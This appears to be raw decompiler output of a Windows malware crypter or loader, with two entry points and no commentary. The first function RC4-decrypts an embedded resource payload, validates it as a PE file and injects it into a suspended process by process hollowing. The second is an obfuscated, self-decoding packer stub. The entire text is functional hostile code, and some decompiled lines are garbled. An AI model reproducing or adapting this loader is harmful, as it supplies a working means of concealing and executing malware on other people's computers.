L00401040() { /* unknown */ void Vfffffffc; (save) & Vfffffffc; (save)4; ecx = *L00407074; (save)ecx; *L00402000 = ecx; *L00402008 = 4223112; (save)4223112; *__imp__VirtualProtect(); return(L0040108A( *L00402008, *L00402000)); }
__entry_point__() { /* unknown */ void Vfffff758; /* unknown */ void Vfffff75c; /* unknown */ void Vfffff760; /* unknown */ void Vfffff764; /* unknown */ void Vfffff768; /* unknown */ void Vfffff78c; /* unknown */ void Vfffff7bc; /* unknown */ void Vfffff9d4; /* unknown */ void Vfffffa34; /* unknown */ void Vfffffab0; /* unknown */ void Vfffffab4; /* unknown */ void Vfffffac4; /* unknown */ void Vfffffac8; /* unknown */ void Vfffffacc; /* unknown */ void Vfffffad0; /* unknown */ void Vfffffad4; /* unknown */ void Vfffffad8; /* unknown */ void Vfffffadc; /* unknown */ void Vfffffae0; /* unknown */ void Vfffffaec; /* unknown */ void Vfffffaf4; /* unknown */ void Vfffffafc; /* unknown */ void Vfffffb00; /* unknown */ void Vfffffb08; /* unknown */ void Vfffffb20; /* unknown */ void Vfffffb2c; /* unknown */ void Vfffffb30; /* unknown */ void Vfffffb3c; /* unknown */ void Vfffffb40; /* unknown */ void Vfffffb48; /* unknown */ void Vfffffb4c; /* unknown */ void Vfffffb58; /* unknown */ void Vfffffb5c; /* unknown */ void Vfffffb68; /* unknown */ void Vfffffbf0; (save)ebp; ebp = esp; esp = esp & -16; esp = esp - 2112; (save)0; esi = *__imp__GetModuleHandleA(); edi = *(esi + 60); edx = *(esi + edi + 6) & 65535; ebx = edi + esi + 248; if(edx > 0) { *esp = edi; edi = edx; Vfffff7bc = esi; esi = 0; do { if(L004018F0(ebx, 4203056, 6) == 0) { break; } esi = esi + 1; ebx = ebx + 40; } while(esi < edi); edi = *esp; esi = Vfffff7bc; } (save) & Vfffffbf0; (save)4; (save)4096; (save)esi; *__imp__VirtualProtect(); (save)4203072; (save)311; *(esi + edi + 136) = *(ebx + 12); (save)esi; *(esi + edi + 140) = *(ebx + 8); edi = *__imp__FindResourceA(); (save)edi; (save)esi; (save) *__imp__LoadResource(); ebx = *__imp__LockResource(); (save)edi; (save)esi; Vfffff78c = *__imp__SizeofResource(); (save)4203072; (save)312; (save)0; esi = *__imp__FindResourceA(); (save)esi; (save)0; edi = *__imp__SizeofResource(); (save)esi; (save)0; (save) *__imp__LoadResource(); esi = *__imp__LockResource(); L00401550(); (save)260; (save) & Vfffffa34; (save)0; *__imp__GetModuleFileNameA(); asm("o16 movq mm1,[0x4020c0]"); asm("o16 movq mm0,[0x4020d0]"); eax = 0; do { asm("o16 movq [esp+eax*4+0x440],mm0"); asm("o16 paddd mm0,mm1"); asm("o16 movq [esp+eax*4+0x450],mm0"); asm("o16 paddd mm0,mm1"); asm("o16 movq [esp+eax*4+0x460],mm0"); asm("o16 paddd mm0,mm1"); asm("o16 movq [esp+eax*4+0x470],mm0"); asm("o16 paddd mm0,mm1"); eax = eax + 16; } while(eax < 256); Vfffff768 = esi; Vfffff764 = edi; *esp = ebx; ecx = 0; esi = 0; do { ebx = *(esp + esi * 4 + 1088); ecx = ecx + ebx; eax = esi; edx = 0; if(!(ecx = ecx + ( *(Vfffff764 / Vfffff764 % Vfffff764 / Vfffff764 + Vfffff768) & 255) & -2147483393)) { ecx = (ecx - 1 | -256) + 1; } eax = *(esp + ecx * 4 + 1088); *(esp + esi * 4 + 1088) = eax; ebx = bl & 255; esi = esi + 1; *(esp + ecx * 4 + 1088) = ebx; } while(esi < 256); ebx = *esp; edx = esi; if(Vfffff760 > 0) { *esp = ebx; esi = 0; edi = ebx; do { if(!(edx = edx + 1 & -2147483393)) { edx = (edx - 1 | -256) + 1; } if(!(ecx = ecx + *(esp + edx * 4 + 1088) & -2147483393)) { ecx = (ecx - 1 | -256) + 1; } *(esp + edx * 4 + 1088) = *(esp + ecx * 4 + 1088); eax = *edi & 255; ebx = bl & 255; *(esp + ecx * 4 + 1088) = ebx; if(!(ebx = *(esp + ecx * 4 + 1088) + *(esp + edx * 4 + 1088) & -2147483393)) { ebx = (ebx - 1 | -256) + 1; } eax = eax ^ *(esp + ebx * 4 + 1088); *edi = al; edi = edi + 1; esi = esi + 1; } while(esi < Vfffff760); ebx = *esp; } asm("o16 pxor mm0,mm0"); asm("Unknown opcode 0x0f"); Vfffffb2c = Vfffffb2c - eax; asm("Unknown opcode 0x0f"); Vfffffb3c = Vfffffb3c - eax; asm("Unknown opcode 0x0f"); Vfffffb4c = Vfffffb4c - eax; asm("Unknown opcode 0x0f"); Vfffffb5c = Vfffffb5c - eax; asm("o16 movd [esp+0x410],mm0"); Vfffffb2c = 68; *L00403010 = ebx; *esp = 65543; if(( *ebx & 65535) == 23117) { eax = *(ebx + 60) + ebx; *L0040300C = eax; if(*eax == 17744) { (save)4202884; (save)4202900; (save) *__imp__GetModuleHandleA(); Vfffffb68 = *__imp__GetProcAddress(); (save)4202916; (save)4202928; (save) *__imp__GetModuleHandleA(); Vfffffb58 = *__imp__GetProcAddress(); (save)4202884; (save)4202952; (save) *__imp__GetModuleHandleA(); Vfffffb5c = *__imp__GetProcAddress(); (save)4202884; (save)4202968; (save) *__imp__GetModuleHandleA(); Vfffffb48 = *__imp__GetProcAddress(); (save)4202884; (save)4202988; (save) *__imp__GetModuleHandleA(); Vfffffb40 = *__imp__GetProcAddress(); (save)4202884; (save)4203008; (save) *__imp__GetModuleHandleA(); esi = *__imp__GetProcAddress(); (save)4202884; (save)4203028; (save) *__imp__GetModuleHandleA(); edi = *__imp__GetProcAddress(); (save) & Vfffffb30; (save) & Vfffffad8; (save)0; (save)0; (save)4; (save)0; (save)0; (save)0; (save) & Vfffff9d4; (save)0; Vfffffb20(); (save) *( *L0040300C + 52); (save)Vfffffb08; Vfffffaf4(); eax = *L0040300C; (save)64; (save)12288; (save) *(eax + 80); (save) *(eax + 52); (save)Vfffffb00; Vfffffafc(); eax = *L0040300C; (save)0; (save) *(eax + 84); (save)ebx; (save) *(eax + 52); (save)Vfffffaec; Vfffffae0(); eax = *L0040300C; if(( *(eax + 6) & 65535) > 0) { Vfffffac4 = edi; edi = Vfffffacc; Vfffffac8 = esi; esi = 0; do { (save)0; edx = esi + esi * 4; edx = *( *L00403010 + 60) + ebx + 248 + edx * 8; (save) *(edx + 16); ecx = *(edx + 12) + *(eax + 52); *L00403008 = edx; (save) *(edx + 20) + ebx; (save)ecx; (save)Vfffffad8; *edi(); eax = *L0040300C; ecx = *(eax + 6) & 65535; esi = esi + 1; } while(esi < ecx); edi = Vfffffab0; esi = Vfffffab4; } ebx = esp; (save)ebx; (save)Vfffffadc; Vfffffad0(); eax = *L0040300C; Vfffff758 = *(eax + 52) + *(eax + 40); (save)ebx; (save)Vfffffad4; *esi(); (save)Vfffffacc; *edi(); } } (save)15000; *__imp__Sleep(); (save)0; *__imp__ExitProcess(); eax = Vfffff758; edx = Vfffff75c; ecx = Vfffff760; }
__entry_point__() { edx = edx - 830117673; ecx = ecx - esi; (save)ebx; (save)edi; ebx = ebx | -109; edi = edi - eax; eax = eax & 75; ecx = ecx + 1769020166; (save)esi; *__imp__GetCommandLineA(); *__imp__GetTickCount(); edi = edi + 1; ebx = ebx - -44; ecx = ecx | 1; ebx = ebx + edx; eax = *__imp__GetCurrentProcessId() ^ ebx; edi = (edi ^ -1315938437) + 461210953; eax = eax + 1; (save)0; edi = (edi | 58) ^ -93; eax = *__imp__RpcStringFreeW() - 87; esi = esi | ecx; edi = eax + 0x401e19; edx = edx & -576671315; (save)0; (save)esp; esi = (esi & 2038903456 | -12) & ecx; eax = eax ^ 99; esi = esi & -29; ecx = ecx - -979118024; (save)64; edx = eax; ecx = ecx - 37; eax = eax ^ ecx; ebx = ebx + -81; (save)3391; eax = (eax | -9) & 1228088333; edx = edx ^ 109; eax = edx; ecx = ecx | edx; esi = esi | 24; eax = eax - 1; eax = *__imp__VirtualProtect(0x401000) & ebx; esi = 0x401000; edx = edx + edi - 1; eax = eax & ebx; ecx = ecx | edx; edx = edx - 1; ecx = ecx + 100; eax = eax + 1765692386; edx = edx - -19; ebx = 3391 >> 2; ecx = edi; ecx = 7; goto ( *edi); ecx = ecx - 1; asm("lodsd"); ecx = ecx + edx - -69 ^ -881175605 | -1424066319; eax = eax + -1381679797; ecx = (ecx | esi) & -105343923; eax = eax ^ -1381679797; ecx = ecx + 47 + 1; *(esi - 4) = eax; eax = eax + ebx & 6 & -23; ecx = edx; if(!(ebx = ebx - 1)) { goto ( *edi); } ecx = 268435455; L00401e5d: esi = esi ^ -58 ^ ebx; edi = edi & -9; edx = edx + 1; ebx = 7; if(ecx = ecx - 1) { goto L00401e5d; } edx = edx - 7; edi = edi - 1; eax = eax & 53 ^ 55; (restore)esi; ebx = 7 - edx; (restore)edi; (restore)ebx; goto L00401001; }